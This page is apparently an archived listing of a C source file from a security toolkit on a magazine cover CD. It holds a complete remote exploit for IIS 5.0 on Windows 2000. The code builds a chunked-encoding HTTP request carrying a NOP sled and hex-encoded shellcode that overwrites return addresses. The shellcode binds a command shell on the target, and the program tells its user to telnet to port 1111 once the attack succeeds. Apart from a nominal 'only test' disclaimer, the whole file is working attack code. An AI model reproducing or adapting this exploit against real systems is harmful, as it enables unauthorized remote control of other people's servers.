Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / 20020410.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 7KB | 224 lines

/* Windows 2000 Server Exploit By CHINANSL Security Team. Test on Windows 2000 Chinese Version, IIS 5.0 , not patched. Warning:THIS PROGRAM WILL ONLY TEST. CHINANSL Technology CO.,LTD http://www.chinansl.com keji@chinansl.com */ #include "stdafx.h" #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #pragma comment (lib,"Ws2_32") int main(int argc, char* argv[]) { if(argc != 4) { printf("%s ip port aspfilepath\n\n",argv [0]); printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n",argv[0]); puts(" programed by keji@chinansl.com"); return 0; } DWORD srcdata=0x01e2fb1c-4;//0x00457474; //address of SHELLCODE DWORD jmpaddr=0x00457494;//0x77ebf094;//0x01e6fcec;//"\x1c\xfb\xe6 \x01";///"\x0c\xfb\xe6\x01"; char* destIP=argv[1]; char* destFile=argv[3]; int webport=atoi(argv[2]); char* pad="\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02 \x02" "PADP"; //16 bytes WSADATA ws; SOCKET s; long result=0; if(WSAStartup(0x0101,&ws) != 0) { puts("WSAStartup() error"); return -1; } struct sockaddr_in addr; addr.sin_family=AF_INET; addr.sin_port=htons(webport); addr.sin_addr.s_addr=inet_addr(destIP); s=socket(AF_INET,SOCK_STREAM,0); if(s==-1) { puts("Socket create error"); return -1; } if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == -1) { puts("Cannot connect to the specified host"); return -1; } char buff[4096]; char* shellcode= "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33 \xc9\x89" "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65 \x6c\x33\x32" "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32 \x2e\xab" "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32 \xc0\x4f" "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53 \xff\xd0\x89" "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53 \xff\xd0" "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75 \xfc\xff\xd3\x89" "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6 \x66\xbe" "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66 \xbe\x3e\x02\x56" "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56 \xff\x75\xfc" "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75 \xfc\xff\xd3\x89" "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75 \xfc\xff\xd3\x89" "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75 \xfc\xff\xd3\x89" "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45 \xe0\x6a" "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8 \xff\xd3" "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3 \x89\x45" "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13 \xff\x75\xf8" "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45 \xc8\x6a" "\x03\xff\x75\xf8\xff\xd3\x89\x85 \x1c\xff\xff\xff\x8d\x7d\xa0\x32" "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0 \xab\xf7\xd0" "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8 \xab\x33\xc0" "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50 \xff\x55" "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4 \x6a\x10" "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75 \xc4\xff" "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45 \xc0\x33" "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50 \xff\x55" "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45 \x94\x50" "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44 \x32\xc0" "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01 \x89\x47" "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89 \x47\x3c" "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85 \x38\xff" "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51 \x53\xff" "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34 \xff\xff\xff\x89" "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85 \x2c\xff\xff\xff\x50" "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85 \x2c\xff\xff\xff\x85" "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85 \x2c\xff\xff\xff\x50\x53" "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0 \x74\x6d" "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30 \xff\xff\xff\xff" "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90 \x90\x90" "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90 \x33\xc0" "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0 \xff\x55\xc8" "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50 \x8d\x85" "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30 \xff\xff" "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4 \xff\x75\xc4" "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95 \x1c\xff\xff\xff\x6a" "\xff\xff\x95\x18\xff\xff\xff"; char* s1="POST ";// HTTP/1.1\r\n"; char* s2="Accept: */*\r\n"; char* s4="Content-Type: application/x-www- form-urlencoded\r\n"; char* s5="Transfer-Encoding: chunked\r\n\r\n"; char* sc="0\r\n\r\n\r\n"; char shellcodebuff[1024*8]; memset(shellcodebuff,0x90,sizeof (shellcodebuff)); memcpy(&shellcodebuff[sizeof(shellcodebuff)- strlen(shellcode)-1],shellcode,strlen(shellcode)); shellcodebuff[sizeof(shellcodebuff)-1] = 0; char sendbuff[1024*16]; memset(sendbuff,0,1024*16); sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost: % s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n% s",s1,destFile,shellcodebuff,s2,destIP,s4,s5,pad/*,srcdata,j mpaddr*/,sc); int sendlen=strlen(sendbuff); *(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr; *(DWORD *)strstr(sendbuff,"AAAA") = srcdata; result=send(s,sendbuff,sendlen,0); if(result == -1 ) { puts("Send shellcode error!"); return -1; } memset(buff,0,4096); result=recv(s,buff,sizeof(buff),0); if(strstr(buff,"<html>") != NULL) { shutdown(s,0); closesocket(s); puts("Send shellcode error!Try again!"); return -1; } shutdown(s,0); closesocket(s); printf("\nUse <telnet %s 1111> to connect to the host\n",destIP); puts("If you cannot connect to the host,try run this program again!"); return 0; }